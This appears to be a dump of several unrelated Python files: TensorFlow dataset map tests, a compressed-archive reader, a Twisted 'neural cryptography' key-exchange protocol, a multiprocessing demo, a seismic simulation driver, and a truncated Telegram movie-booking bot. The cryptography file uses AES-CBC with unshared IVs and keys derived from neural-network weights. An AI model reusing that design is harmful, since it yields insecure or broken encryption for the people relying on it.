"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
def testNestedDatasetMap(self):
# TODO(b/110122868): When iterators can yield a `tf.data.Dataset`, remove
# the `get_single_element()` call.
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0]).map(
dataset_ops.Dataset.from_tensor_slices).map(
lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
def testReturnValueError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\): None."):
_ = dataset.map(lambda x: None)
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type
# attr.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
self.assertDatasetProduces(
dataset, expected_error=(errors.InvalidArgumentError, "BrokenConst"))
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
("Map", lambda dataset, func:
dataset_ops.MapDataset(dataset, func, use_inter_op_parallelism=False)),
("ParallelMap", lambda dataset, func:
dataset_ops.ParallelMapDataset(dataset, func, num_parallel_calls=1,
use_inter_op_parallelism=False)),
)
def testNoInterOpParallelism(self, make_dataset_fn):
dataset = dataset_ops.Dataset.from_tensors(0)
def _get_tid():
return np.int64(threading.current_thread().ident)
def _map_fn(_):
tids = []
for _ in range(10):
tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
return tids
dataset = make_dataset_fn(dataset, _map_fn)
get_next = self.getNext(dataset)
tids = self.evaluate(get_next())
self.assertTrue(all(tids[0] == tid for tid in tids))
# pylint: enable=g-long-lambda
@parameterized.named_parameters(
("SequentialIdentity", None, lambda x: x, None),
("SequentialReplicate", None, lambda x: (x, x), None),
("SequentialSwap", (None, None), lambda x, y: (y, x), None),
("SequentialProject", (None, None), lambda x, y: x, None),
("ParallelIdentity", None, lambda x: x, 10),
("ParallelReplicate", None, lambda x: (x, x), 10),
("ParallelSwap", (None, None), lambda x, y: (y, x), 10),
("ParallelProject", (None, None), lambda x, y: x, 10),
)
def testShortCircuit(self, structure, map_fn, num_parallel_calls):
dataset = self.structuredDataset(structure).repeat().map(
map_fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
if isinstance(structure, tuple):
expected = map_fn(*self.evaluate(self.structuredElement(structure)))
else:
expected = map_fn(self.evaluate(self.structuredElement(structure)))
self.assertEqual(expected, self.evaluate(get_next()))
@parameterized.named_parameters(
("Sequential", None),
("Parallel", 10),
)
def testShortCircuitCapturedInput(self, num_parallel_calls):
captured_t = variables.Variable(42)
dataset = self.structuredDataset(None).repeat().map(
lambda x: captured_t, num_parallel_calls=num_parallel_calls)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
self.assertEqual(42, self.evaluate(get_next()))
@parameterized.named_parameters(
("1", 1, 1),
("2", 10, 1),
("3", 10, 10),
("4", 100, 1),
("5", 100, 10),
("6", 100, 100),
)
def testSloppyInterleaveInOrder(self, num_elements, num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(num_elements):
coordination_events[i].set()
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@parameterized.named_parameters(
("1", 10, 10),
("2", 100, 10),
("3", 100, 100),
)
def testSloppyInterleaveOutOfOrder(self, num_elements, num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
elements = [x for x in range(num_elements)]
for i in [1, 4, 7]:
elements[i], elements[i + 1] = elements[i + 1], elements[i]
for element in elements:
coordination_events[element].set()
self.assertEqual(element * element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@parameterized.named_parameters(
("Map", None),
("ParallelMap", 12),
)
def testPreserveCardinality(self, num_parallel_calls):
def py_fn(_):
raise StopIteration()
dataset = dataset_ops.DatasetV2.from_tensors(0).map(
lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
if __name__ == "__main__":
test.main()
|
__init__.py
|
import os
import zstandard
import ujson as json
import time
import tarfile
import codecs
from functools import reduce
import jsonlines
import io
from zipfile import ZipFile
import gzip
from math import ceil
import mmap
import multiprocessing as mp
from pathlib import Path
#TODO : Hook FilterData Class for processing and additional processing.
from .code_clippy_data_utils import FilterData
VALID_EXTENSIONS = ['openwebtext.tar.xz', '_data.xz', '.dat.zst', '.jsonl', '.jsonl.zst', '.jsonl.zst.tar', '.json.zst', '.txt', '.zip', '.tar.gz', '.json.gz', '.gz']
def has_valid_extension(file):
return any([file.endswith(ext) for ext in VALID_EXTENSIONS])
def _listdir_or_file(x):
if isinstance(x, list):
return reduce(lambda x, y: x + y, map(listdir_or_file, sorted(x)))
if os.path.isfile(x):
return [x]
elif os.path.isdir(x):
return [str(Path(x) / fn) for fn in sorted(os.listdir(x))]
else:
raise FileNotFoundError(f"{x} not found")
def listdir_or_file(x):
return list(filter(has_valid_extension, _listdir_or_file(x)))
def tarfile_reader(file, streaming=False):
# we need our own tarfile parser because `tarfile` doesn't work well for
# big tarfiles; it seems to be reading the entire file to get a list of
# where all the files are - but we don't need that because we just need
# to see each file once. surprisingly, `tarfile` doesn't expose any
# facilities for this. the only options are 1. load the entire tarfile
# and then query by filename or 2. extract to disk - and neither of
# these is what we want.
offset = 0
paxfilesize = None
while True:
hdr = file.read(512)
offset += 512
# https://www.gnu.org/software/tar/manual/html_node/Standard.html
# end at 135 not 136 because of \0 terminator
if hdr[124:135] == b'\0'*11:
# end of record
break
fname = hdr[:100].split(b'\0')[0]
# if the file is too big to fit in the size field, tarfiles will actually
# include a PaxHeader with the size in it, applicable to the immediate next file.
if paxfilesize is not None:
size = paxfilesize
paxfilesize = None
else:
size = int(hdr[124:135], 8)
padded_size = ceil(size / 512) * 512
# for handling PaxHeader files (which contain extra metadata about file size) and directories
# https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_03
type = chr(hdr[156])
if type == 'x':
meta = file.read(padded_size)[:size]
def kv(x):
return x.decode('utf-8').split(' ')[1].split('=')
paxfileattrs = {
kv(x)[0]: kv(x)[1]
for x in meta.split(b'\n') if x
}
paxfilesize = int(paxfileattrs['size'])
offset += padded_size
continue
elif type != '0' and type != '\0':
if streaming:
file.seek(padded_size, os.SEEK_CUR)
else:
file.read(padded_size)
offset += padded_size
continue
if streaming:
# skip directory entries
if size != 0:
mmo = mmap.mmap(file.fileno(), length=offset + size, access=mmap.ACCESS_READ)
mmo.seek(offset)
yield mmo
file.seek(padded_size, os.SEEK_CUR)
else:
yield file.read(padded_size)[:size]
offset += padded_size
# def handle_jsonl(jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
# """
# OBSOLETE
# """
# for ob in jsonl_reader:
# # naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
# if isinstance(ob, str):
# assert not get_meta
# yield ob
# continue
# #TODO : reading file name of the datapoint and pass the FilterData util
# if filter_data_class.filter_file_extension(ob):
# text = ob[key]
# text = ob["file_name"] + r"#@#@#" + text
# if autojoin_paragraphs and isinstance(text, list):
# text = para_joiner.join(text)
# if get_meta:
# yield text, (ob['meta'] if 'meta' in ob else {})
# else:
# yield text
# else:
# pass
class Reader:
def __init__(self, in_path,extension_path):
self.in_path = in_path
self.filter_data_class = FilterData(extension_path)
self.spl_split_token = r"_#@#_" #special split token to take out the file extension.
def stream_data(self, get_meta=False, threaded=False):
if not threaded:
yield from self._stream_data(get_meta)
return
q = mp.Queue(1000)
p = mp.Process(target=self._stream_data_threaded, args=(q, get_meta))
p.start()
while p.is_alive():
res = q.get()
if res is None: break
yield res
def _stream_data_threaded(self, q, get_meta=False):
for data in self._stream_data(get_meta):
q.put(data)
q.put(None)
def _stream_data(self, get_meta=False, jsonl_key="text"):
self.f_name = ""
files = listdir_or_file(self.in_path)
if not files:
raise FileNotFoundError(f"No valid file(s) found in {self.in_path}")
for f in files:
self.f_name = f
if f == 'openwebtext.tar.xz':
assert not get_meta
yield from self.read_owt(f)
elif 'urlsf_subset' in f and f.endswith('_data.xz'):
assert not get_meta
yield from self.read_owt_subset(f)
elif f.endswith('.dat.zst'):
assert not get_meta
yield from self.read_dat(f)
elif f.endswith('.jsonl'):
yield from self.read_jsonl(f, get_meta, key=jsonl_key)
elif f.endswith('.jsonl.zst'):
yield from self.read_jsonl_zst(f, get_meta, key=jsonl_key)
elif f.endswith('.jsonl.zst.tar'):
yield from self.read_jsonl_tar(f, get_meta, jsonl_key=key)
elif f.endswith('.json.zst'):
assert not get_meta
yield from self.read_json(f)
elif f.endswith('.txt'):
assert not get_meta
yield from self.read_txt(f)
elif f.endswith('.zip'):
assert not get_meta
yield from self.read_zip(f)
elif f.endswith('.tar.gz'):
assert not get_meta
yield from self.read_tgz(f)
elif f.endswith('.json.gz'):
assert not get_meta
yield from self.read_jsongz(f)
elif f.endswith('.gz'):
assert not get_meta
yield from self.read_gz(f)
else:
# shouldn't be reached
print(f'Skipping {f} as streaming for that filetype is not implemented')
#adding "stat_logs/pl_stat.json" logging
#self.log_stat_json(self.filter_data_class.stat_extension)
def read_txt(self, file):
with open(file, 'r') as fh:
yield fh.read()
def read_zip(self, file):
archive = ZipFile(file, 'r')
for f in archive.namelist():
yield archive.read(f).decode('UTF-8')
def read_tgz(self, file):
gz = gzip.open(file)
yield from (x.decode('utf-8') for x in tarfile_reader(gz, streaming=False))
def read_gz(self, file):
with gzip.open(file, 'rb') as f:
for line in f:
yield line.decode('utf-8')
def read_jsongz(self, file):
for line in self.read_gz(file):
yield json.loads(line)
def read_json(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
ob = json.load(reader)
yield from ob
def read_dat(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
while True:
ln = reader.read(16).decode('UTF-8')
if not ln:
break
ln = int(ln)
yield reader.read(ln).decode('UTF-8')
def read_jsonl(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with jsonlines.open(file) as rdr:
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_zst(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(fh))
rdr = jsonlines.Reader(reader)
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_tar(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
for f in tarfile_reader(fh, streaming=True):
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(f))
rdr = jsonlines.Reader(reader)
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
f.close()
def read_owt(self, file):
tar = tarfile.open(file, encoding='utf-8')
utf8reader = codecs.getreader('utf-8')
for name in tar.getmembers():
fp = tar.extractfile(name)
inner_tar = tarfile.open(fileobj=fp, encoding='utf-8')
for inner_name in inner_tar.getmembers():
inner_fp = utf8reader(inner_tar.extractfile(inner_name))
contents = inner_fp.read()
yield contents
def read_owt_subset(self, file):
utf8reader = codecs.getreader('utf-8')
tar = tarfile.open(file, encoding='utf-8')
for name in tar.getmembers():
fp = utf8reader(tar.extractfile(name))
contents = fp.read()
yield contents
def handle_jsonl(self,jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
for ob in jsonl_reader:
# naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
if isinstance(ob, str):
assert not get_meta
yield ob
continue
#TODO : reading file name of the datapoint and pass the FilterData util
filter_flag = self.filter_data_class.filter_file_extension(ob) #reshinth - Changed meta to file utils.
if filter_flag:
text = ob[key]
text = ob["meta"]["file_name"] + self.spl_split_token + text
if autojoin_paragraphs and isinstance(text, list):
text = para_joiner.join(text)
if get_meta:
yield text, (ob['meta'] if 'meta' in ob else {})
else:
yield text
else:
pass
class Archive:
def __init__(self, out_dir, compression_level=3):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.i = 0
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.cctx = zstandard.ZstdCompressor(level=compression_level, threads=8)
self.compressor = self.cctx.stream_writer(self.fh)
def add_data(self, data, meta={}):
self.compressor.write(json.dumps({'text': data, 'meta': meta}).encode('UTF-8') + b'\n')
def commit(self, archive_name='default'):
fname = self.out_dir + '/data_' + str(self.i) + '_time' + str(int(time.time())) + '_' + archive_name + '.jsonl.zst'
self.compressor.flush(zstandard.FLUSH_FRAME)
self.fh.flush()
self.fh.close()
os.rename(self.out_dir + '/current_chunk_incomplete', fname)
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.compressor = self.cctx.stream_writer(self.fh)
self.i += 1
class DatArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self, archive_name=None):
# TODO: streaming
cctx = zstandard.ZstdCompressor(level=3)
if archive_name is None:
archive_name = str(int(time.time()))
res = b''.join(map(lambda x: ("%016d" % len(x)).encode('UTF-8') + x, map(lambda x: x.encode('UTF-8'), self.data)))
cdata = cctx.compress(res)
with open(self.out_dir + '/data_' + str(self.i) + '_' + archive_name + '.dat.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
class JSONArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self):
cctx = zstandard.ZstdCompressor(level=3)
cdata = cctx.compress(json.dumps(self.data).encode('UTF-8'))
with open(self.out_dir + '/data_' + str(self.i) + '_' + str(int(time.time())) + '.json.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
|
protocol.py
|
from twisted.internet.protocol import Protocol
from twisted.internet.protocol import Factory
from twisted.internet.endpoints import TCP4ServerEndpoint
from twisted.internet import reactor
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from threading import Thread
from tpm import *
import json
import base64
# Used to access the index in the exchanged messages
MESSAGE_TYPE = 0
MESSAGE = 1
# The types of the messages exchanged
TYPE_INPUTS = 0
TYPE_OUTPUT_SERVER = 1
TYPE_OUTPUT_CLIENT = 2
TYPE_ACK = 3
TYPE_TEST = 4
TYPE_TEST_OK = 5
TYPE_MESSAGE = 6
SYNC_THRESHOLD = 20
TEST_MESSAGE = 'SYNCED'
class NeuralCryptography(Protocol):
def __init__(self):
self.tpm = TreeParityMachine(4,3);
self.count = 0
self.syncronized = False
self.key = None
self.cipher = None
def syncronizer(self, data):
data = json.loads(data)
if self.count == SYNC_THRESHOLD:
self.test_sync()
elif data[MESSAGE_TYPE] == TYPE_INPUTS:
self.receive_inputs(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_OUTPUT_SERVER:
self.receive_output_from_server(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_OUTPUT_CLIENT:
self.receive_output_from_client(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_ACK:
self.receive_ack()
elif data[MESSAGE_TYPE] == TYPE_TEST:
self.receive_test(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_TEST_OK:
self.receive_test_ok()
def receive_inputs(self, inputs):
self.tpm(inputs)
self.transport.write(json.dumps([TYPE_OUTPUT_SERVER, self.tpm.y]))
def receive_output_from_server(self, output):
self.transport.write(json.dumps([TYPE_OUTPUT_CLIENT, self.tpm.y]))
if self.tpm.y == output:
self.count += 1
self.tpm.train()
else:
self.count = 0
def receive_output_from_client(self, output):
if self.tpm.y == output:
self.count += 1
self.tpm.train()
else:
self.count = 0
self.transport.write(json.dumps([TYPE_ACK, 0]))
def receive_ack(self):
self.tpm.generate_inputs()
self.tpm(self.tpm.x)
self.transport.write(json.dumps([TYPE_INPUTS, self.tpm.x]))
def synced(self):
return self.syncronized
def test_sync(self):
self.count = 0
self.generate_key()
self.cipher = AES.new(self.key, AES.MODE_CBC)
ciphertext = self.cipher.encrypt(self.pad(TEST_MESSAGE.encode('utf-8')))
ciphertext = base64.b64encode(ciphertext)
self.transport.write(json.dumps([TYPE_TEST, ciphertext]))
def receive_test(self, ciphertext):
self.generate_key()
self.cipher = AES.new(self.key, AES.MODE_CBC)
ciphertext = base64.b64decode(ciphertext)
plaintext = self.cipher.decrypt(ciphertext)
plaintext = self.unpad(plaintext)
if plaintext == TEST_MESSAGE:
self.transport.write(json.dumps([TYPE_TEST_OK, TEST_MESSAGE]))
self.syncronized = True
print self.tpm.weights()
self.start_service()
else:
self.transport.write(json.dumps([TYPE_ACK, 0]))
def receive_test_ok(self):
self.syncronized = True
self.start_service()
print self.tpm.weights()
def generate_key(self):
seed = str(self.tpm.weights())
sha = SHA256.new()
sha.update(seed)
self.key = sha.digest()
return self.key
def pad(self, s):
BS = 16
return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
def unpad(self, s):
return s[0:-ord(s[-1])]
def call(self, target, args):
self.thread = Thread(target=target, args=(args))
def receive(self, target):
self.data_received = target
def start_service(self):
self.thread.start()
def received(self, data):
data = json.loads(data)
ciphertext = data[MESSAGE]
ciphertext = base64.b64decode(ciphertext)
plaintext = self.cipher.decrypt(ciphertext)
plaintext = self.unpad(plaintext)
self.data_received(plaintext)
def send_message(self, data):
ciphertext = self.cipher.encrypt(self.pad(data))
ciphertext = base64.b64encode(ciphertext)
self.transport.write(json.dumps([TYPE_MESSAGE, ciphertext]))
|
concurrency_06.py
|
import multiprocessing
manager = multiprocessing.Manager()
namespace = manager.Namespace()
def set_first_variable():
namespace.first = 42
p = multiprocessing.Process(target=set_first_variable)
p.start()
p.join()
def set_second_variable():
namespace.second = dict(value=42)
p = multiprocessing.Process(target=set_second_variable)
p.start()
p.join()
import datetime
def set_custom_variable():
namespace.last = datetime.datetime.utcnow()
p = multiprocessing.Process(target=set_custom_variable)
p.start()
p.join()
def print_variables():
print(namespace.first, namespace.second, namespace.last)
p = multiprocessing.Process(target=print_variables)
p.start()
p.join()
|
generate_forward_simulations_fault_2ms_r.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 13:38:15 2019
@author: bmoseley
"""
import shutil
import sys
import numpy as np
import multiprocessing, queue
import time
sys.path.insert(0, '../shared_modules/')
import io_utils
from helper import run_command
### TODO:
#
# Consider writing my own fortran code e.g using f2py
# to keep everything in memory
# it appears fortran is much quicker than numpy for seismiccpml
#### PARAMETERS
#VEL_RUN = "layers"
#SIM_RUN = "layers_2ms"
VEL_RUN = "fault"
SIM_RUN = "fault_2ms_r"
if 'linux' in sys.platform.lower(): ROOT_DIR = "/data/greypartridge/not-backed-up/aims/aims17/bmoseley/DPhil/Mini_Projects/DIP/forward_seisnets_paper/generate_data/"
else: ROOT_DIR = ""
#N_VELS = 50000
N_VELS = 100000
SEED = 123
#QC_FREQ = 5000 # when to output full wavefield or not (I/O heavy)
#n_processes = 6
QC_FREQ = 10000 # when to output full wavefield or not (I/O heavy)
n_processes = 42
## For WAVENET
#RANDOMSOURCE = False
#N_REC = 11
#DELTAREC = 50.0 # receiver spacing (m)
## For AUTOENCODER
RANDOMSOURCE = True
N_REC = 32
DELTAREC = 15.0 # receiver spacing (m)
##
SOURCE_Yi = 14# source depth
##
NX = 128
NY = 128
DELTAX = 5. # grid spacing (m)
DELTAY = 5. # grid spacing (m)
NPOINTS_PML = 10 # number of PML points
NSTEPS = 512*4
DELTAT = 0.0005 # sample rate for FD modelling (s)
ds = 4# downsample factor (for pre-processing)
##
####
np.random.seed(SEED)
## Place sources
if RANDOMSOURCE:# 3 sources per velocity model
source_is = np.random.randint(4+NPOINTS_PML, NX-NPOINTS_PML-4, (N_VELS, 3, 1))
source_is = np.concatenate([source_is, SOURCE_Yi*np.ones((N_VELS, 3, 1), dtype=int)], axis=2)
else:# 1 source per velocity model
source_is = np.concatenate([(NX//2)*np.ones((N_VELS, 1, 1), dtype=int), SOURCE_Yi*np.ones((N_VELS, 1, 1), dtype=int)], axis=2)
receiver_is = np.array([int(np.floor( (DELTAX*NX/2. -(N_REC-1)*DELTAREC/2. + i*DELTAREC) / DELTAX) ) for i in range(N_REC)])
receiver_is = np.concatenate([receiver_is.reshape((N_REC,1)), SOURCE_Yi*np.ones((N_REC, 1), dtype=int)], axis=1)
print(source_is)
print()
print(receiver_is)
print()
def generate_example(ivel):
SIM_NUM = ivel
VEL_FILE = VEL_DIR + "velocity_%.8i.txt"%(ivel)
if SIM_NUM % QC_FREQ == 0: OUTPUT_WAVEFIELD = 1
else: OUTPUT_WAVEFIELD = 0# whether to output wavefield (I/O heavy!)
# run a separate simulation for each source
for isource,source_i in enumerate(source_is[SIM_NUM]):
# create a temporary directory for simulation output (prevent I/O clash between processes)
TEMP_OUT_SIM_DIR = OUT_SIM_DIR + str(SIM_NUM) + "/"
io_utils.get_dir(TEMP_OUT_SIM_DIR)
# create receiver file
RECEIVER_FILE = TEMP_OUT_SIM_DIR + "receiver_ijs_%s_%i.txt"%(SIM_RUN,SIM_NUM)
with open(RECEIVER_FILE,'w') as f:
f.write("%i\n"%(N_REC))
for rec_i in receiver_is: f.write("%i %i\n"%(rec_i[0]+1, rec_i[1]+1))# SEISMIC CPML uses indices starting at 1
# create source file (single source)
SOURCE_FILE = TEMP_OUT_SIM_DIR + "source_ijs_%s_%i.txt"%(SIM_RUN,SIM_NUM)
with open(SOURCE_FILE,'w') as f:
f.write("%i\n"%(1))
f.write("%i %i\n"%(source_i[0]+1, source_i[1]+1))# SEISMIC CPML uses indices starting at 1
# RUN FORWARD SIMULATION
cmd = "./xben_seismic_CPML_2D_pressure_second_order " + \
"%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s"%(
NSTEPS,
NX,
NY,
DELTAX,
DELTAY,
DELTAT,
NPOINTS_PML,
0,# SOURCE_X (m)
0,# SOURCE_Z (m)
SOURCE_FILE,
VEL_FILE,
TEMP_OUT_SIM_DIR,
SIM_NUM,
RECEIVER_FILE,
OUTPUT_WAVEFIELD)
return_code = run_command(cmd.split(" "),verbose=False) # run
if return_code != 0:
print("ERROR: Simulation %i, %i broke, check stderr"%(ivel, isource))
# CLEAR INTERMEDIARY FILES (CAREFUL !)
io_utils.remove_dir(TEMP_OUT_SIM_DIR)
return False
# IMPORT GATHER INTO NUMPY
gather = np.zeros((N_REC, NSTEPS), dtype=np.float32)
file = TEMP_OUT_SIM_DIR + "gather_%.8i.bin"%(SIM_NUM)
# Read each binary gather file (MUCH QUICKER THAN READING TEXT FILES, beacause its directed)
with open(file,'rb') as f:
#Note SEISMIC_CPML double precision saved to 64 bit floats (!) we DOWNSAMPLE to 32 bit floats
# count = number of items (==np.float64 values) to process)
for irec in np.arange(N_REC): gather[irec,:] = np.fromfile(f, dtype=np.float64, count = NSTEPS).astype(np.float32)
# PRE-PROCESSING
gather_decimated = np.copy(gather)# important to copy
gather_decimated = gather_decimated[:,::ds]# DOWNSAMPLE GATHER
# SAVE
np.save(OUT_SIM_DIR + "gather_%.8i_%.8i.npy"%(SIM_NUM,isource), gather_decimated)
# IMPORT WAVEFIELDS INTO NUMPY (for QC)
if OUTPUT_WAVEFIELD:
wavefields = np.zeros((NSTEPS,NX,NY), dtype=np.float32)
files = [TEMP_OUT_SIM_DIR + "wavefield_%.8i_%.8i.bin"%(SIM_NUM, i+1) for i in range(NSTEPS)]# SEISMIC CPML uses indices starting at 1
for i in range(NSTEPS):
# Read each binary wavefield file (MUCH QUICKER THAN READING TEXT FILES, beacause its directed)
with open(files[i],'rb') as f:
#Note SEISMIC_CPML double precision saved to 64 bit floats (!) we DOWNSAMPLE to 32 bit floats
# count = number of items (==np.float64 values) to process)
for iz in np.arange(NY): wavefields[i,:,iz] = np.fromfile(f, dtype=np.float64, count = NX).astype(np.float32)
np.save(OUT_SIM_DIR + "wavefields_%.8i_%.8i.npy"%(SIM_NUM,isource), wavefields)
np.save(OUT_SIM_DIR + "gather_raw_%.8i_%.8i.npy"%(SIM_NUM,isource), gather)
# CLEAR INTERMEDIARY FILES (CAREFUL !)
io_utils.remove_dir(TEMP_OUT_SIM_DIR)
return True
def worker_function(taskQ, resultQ):
"""Try to get a ivel from tastQ to run. If sucessful, run forward modelling and push result to resultQ.
If taskQ is empty, terminate."""
while True:
try: ivel = taskQ.get(block=True, timeout=10)# try to get the next task, allow some time for process clash (ivel number)
except queue.Empty: break# kill process if no more tasks left
example = generate_example(ivel)
resultQ.put(example)# push the example to the results queue
if __name__ == "__main__":
# initiate
VEL_DIR = ROOT_DIR + "velocity/" + VEL_RUN + "/"
OUT_SIM_DIR = ROOT_DIR + "gather/" + SIM_RUN + "/"
# clear output directory for all simulations
io_utils.get_dir(OUT_SIM_DIR)
#save copy of this script for future reference
shutil.copyfile('generate_forward_simulations.py', OUT_SIM_DIR + 'generate_forward_simulations_%s.py'%(SIM_RUN))
# save source, receiver positions
np.save(OUT_SIM_DIR + "source_is.npy", source_is)
np.save(OUT_SIM_DIR + "receiver_is.npy", receiver_is)
# make queues
taskQ = multiprocessing.Queue()
resultQ = multiprocessing.Queue()
# push simulations to queues
for ivel in range(N_VELS): taskQ.put(ivel)
workers = [multiprocessing.Process(target=worker_function, args=(taskQ, resultQ)) for _ in range(n_processes)]
for worker in workers: worker.start()
# listen to results queue and write results to output
count = 0
start = start0 = time.time()
while count != N_VELS:
try:
_ = resultQ.get(False)# try to get next result immediately
count +=1
print("example written (count: %i of %i)"%(count, N_VELS))
if count % 100 == 0:
rate = 100./(time.time()-start)
total = (time.time()-start0)/60.
print("%.2f examples /sec"%(rate))
start = time.time()
print("Worker status': %s"%([worker.exitcode for worker in workers]))
except queue.Empty: pass
print("%i examples written"%(count))
print("Simulations complete")
|
standalone_bot.py
|
import urllib3
import telegram
from bs4 import BeautifulSoup
import time
import requests
from lxml import html
import argparse
from urllib.parse import urlparse
import threading
CHECKING = "Sorry bookings are not open for Movie you wanted, Don't worry i will be checking and will tell you once it is available."
BOOKING_OPEN = "Hurray ! Bookings open for movie you Wanted ! \n \n {}"
DEFAULT = "Hello There, Welcome to movie_reminder_bot send me messages using the following format - MU:url1,url2"
BUTTON_CLASS = "showtimes btn _cuatro"
NO_MESSAGE = "No Messages yet ..."
STD_HEADERS = {"User-Agent": "Magic Browser"}
CONTENT_TYPE = "lxml"
URL_FORMAT = "http"
SENDING = "sending message ..."
THREAD_NAME = "requester"
SNOOZE_TIME = 10
BOOK_MSG = "Booking message sent..."
CHECKING_MSG = "Checking message sent..."
class User:
USER_MAPPING = {}
def analyze_message(self, chat_id, message):
if URL_FORMAT not in message:
return False
url = message.split(":", 1)[1]
if url:
if self.USER_MAPPING.get(chat_id):
self.USER_MAPPING[chat_id].append(url)
return True
else:
self.USER_MAPPING[chat_id] = []
self.USER_MAPPING[chat_id].append(url)
return True
else:
return False
class Check_Movie(User):
def __init__(self, bot_key):
super().__init__()
self.bot = telegram.Bot(token=bot_key)
self.monitor()
self.update_id = None
self._start_message_processing()
def _start_message_processing(self):
while True:
self.chat, self.msg = self._get_updates()
if self.chat and self.msg:
res = self.analyze_message(self.chat, self.msg)
if res:
for chat_id, msg in self.USER_MAPPING.items():
self._make_request(chat_id, msg)
time.sleep(5)
else:
time.sleep(5)
else:
self.send_message(self.bot, self.chat, DEFAULT)
def _get_updates(self):
try:
updates = self.bot.get_updates(offset=self.update_id, timeout=5)
except TimeoutError:
pass
if len(updates) == 0:
print(NO_MESSAGE)
return None, None
else:
resp = updates.pop()
chat_id = resp.message.chat_id
msg = resp.message.text
self.update_id = resp.update_id + 1
return chat_id, msg
def _make_request(self, chat_id, url):
for movie_url in url:
self._do_request_bookmyshow(chat_id, movie_url)
def _do_request_bookmyshow(self, chat_id, url):
response = requests.get(url, headers=STD_HEADERS)
soup = BeautifulSoup(response.content, CONTENT_TYPE)
data = soup.find_all(class_=BUTTON_CLASS)
if len(data) == 1:
